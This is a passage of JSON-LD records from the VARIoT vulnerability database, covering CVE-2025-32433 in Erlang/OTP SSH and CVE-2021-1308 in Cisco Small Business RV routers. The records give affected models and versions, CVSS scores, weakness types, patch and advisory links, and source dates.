            "url": "https://github.com/prodefense/cve-2025-32433/blob/main/cve-2025-32433.py"
          },
          {
            "trust": 1.0,
            "url": "https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f"
          },
          {
            "trust": 1.0,
            "url": "https://github.com/erlang/otp/commit/0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2025-32433"
          },
          {
            "trust": 1.0,
            "url": "https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891"
          },
          {
            "trust": 1.0,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-erlang-otp-ssh-xyzzy"
          },
          {
            "trust": 1.0,
            "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00028.html"
          },
          {
            "trust": 1.0,
            "url": "https://github.com/erlang/otp/security/advisories/ghsa-37cp-fgq5-7wc2"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96418823/"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2025-32433"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-140-07"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2025-06-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "date": "2025-04-16T22:15:14.373000",
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2025-06-13T05:39:00",
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "date": "2025-11-04T14:49:05.177000",
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ERLANG\u00a0 of \u00a0Erlang/OTP\u00a0 Vulnerabilities related to lack of authentication for important functions in products from multiple vendors",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          }
        ],
        "trust": 0.8
      }
    }

    VAR-202104-0380

    Vulnerability from variot - Updated: 2024-11-23 22:37

    Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0380",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv132w adsl2+ wireless-n vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv134w vdsl2 wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "link layer discovery protocol",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "cve": "CVE-2021-1308",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2021-1308",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CNVD-2021-35514",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.4,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-1308",
                "impactScore": 4.0,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Adjacent Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.4,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2021-1308",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1308",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1308",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1308",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-35514",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-434",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-1308",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1308",
            "trust": 3.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.1171.3",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "id": "VAR-202104-0380",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          }
        ],
        "trust": 1.1394850175
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:37:02.748000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-multi-lldp-u7e4chCe",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe"
          },
          {
            "title": "Patch for Cisco Link Layer Discovery Protocol buffer overflow vulnerability (CNVD-2021-35514)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/265676"
          },
          {
            "title": "Cisco Link Layer Discovery Protocol Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147016"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-multi-lldp-u7e4chCe"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-401",
            "trust": 1.0
          },
          {
            "problemtype": "Buffer error (CWE-119) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1308"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.1171.3"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-05-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "date": "2021-04-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "date": "2021-12-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "date": "2021-04-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "date": "2021-04-08T04:15:11.983000",
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-05-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-35514"
          },
          {
            "date": "2021-04-15T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1308"
          },
          {
            "date": "2021-12-13T09:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          },
          {
            "date": "2024-11-21T05:44:03.550000",
            "db": "NVD",
            "id": "CVE-2021-1308"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote or local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Buffer error vulnerability in series routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005371"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-434"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0381

    Vulnerability from variot - Updated: 2024-11-23 22:37

    Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0381",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv132w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv134w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.0.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.14"
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.20"
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
